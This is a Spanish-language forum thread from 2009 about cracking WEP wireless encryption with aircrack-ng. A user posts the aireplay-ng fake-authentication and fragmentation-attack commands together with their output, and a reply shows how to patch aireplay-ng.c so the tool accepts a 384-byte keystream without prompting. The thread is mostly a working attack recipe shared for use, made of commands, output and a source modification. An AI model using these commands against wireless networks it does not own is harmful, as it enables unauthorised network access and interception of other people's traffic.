Seguridad Wireless - Wifi
Sistemas operativos => Zona GNU/Linux => Mensaje iniciado por: Edagner en 21-07-2009, 22:54 (Martes)
-
Hola, pues estuve probando el ataque de fragmentación + packetforge sobre mi punto de acceso con clave WEP y me surge lo siguiente:
1º) Me asocio
aireplay-ng -1 6000 -o 1 -q 10 -e Mi_AP -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
2º)
aireplay-ng -5 -F -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
Resultados:
El ataque funciona:
Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
El ataque falla:
Me pregunta si quiero usar solo 384 bytes of a keystream
¿Existe algun parámetro para decirle automáticamente que si?
Tipo: -yes
aireplay-ng -5 -F -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0 -yes
Y así: Now you can build a packet with packetforge-ng out of that 384 bytes keystream
A mi no se me ocurrió nada salvo editar el código fuente del aireplay-ng y hacer que lo guarde tenga el que tenga.
Saludos!
-
Buenas, por si a alguien le interesa se puede solucionar así:
Nos bajamos el aircrack-ng-1.0-rc3
Vamos al fichero: aircrack-ng-1.0-rc3\src\aireplay-ng.c
Buscamos esto:
printf("Still nothing, quitting with 384 bytes? [y/n] \n");
fflush( stdout );
ret=0;
while(!ret) ret = scanf( "%s", tmpbuf );
printf( "\n" );
Y lo dejamos así:
printf("Still nothing, quitting with 384 bytes? [y/n] \n");
fflush( stdout );
ret=1;
//while(!ret) ret = scanf( "%s", tmpbuf );
tmpbuf[0] = 'y';
printf( "\n" );
De esta manera obtendremos:
Now you can build a packet with packetforge-ng out of that 384 bytes keystream
Sin tener que pulsar el 'y' que nos pide.
;)